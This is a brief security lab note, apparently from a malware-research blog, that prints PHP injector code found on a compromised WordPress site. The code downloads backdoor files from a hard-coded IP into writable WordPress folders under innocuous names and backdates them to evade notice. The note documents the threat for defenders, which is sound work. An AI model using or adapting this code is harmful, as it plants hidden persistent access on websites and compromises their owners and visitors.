Backdoor Injector code

Labs Note

A backdoor injector code we found on a compromised site:

if(is__writable($dir."/wp-includes/")):
        file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-includes/page.php', $time);
        die(";;/wp-includes/page.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){
        file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);
        die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload");
}

if(is__writable($dir."/wp-admin/")):
        file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-admin/options-plugin.php', $time);
        die(";;/wp-admin/options-plugin.php;;true_upload");
endif;

if(is__writable($dir."/")):
        file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-plugin.php', $time);
        die(";;/wp-plugin.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/")){
        file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-content/themes/theme.php', $time);
        die(";;/wp-content/themes/theme.php;;true_upload");
}

if(is__writable($dir."/wp-content/uploads/")){
        file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/uploads/timthumb.php', $time);
        die(";;/wp-content/uploads/timthumb.php;;true_upload");
}else{
        die(";;0;;false_upload");

It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.

You May Also Like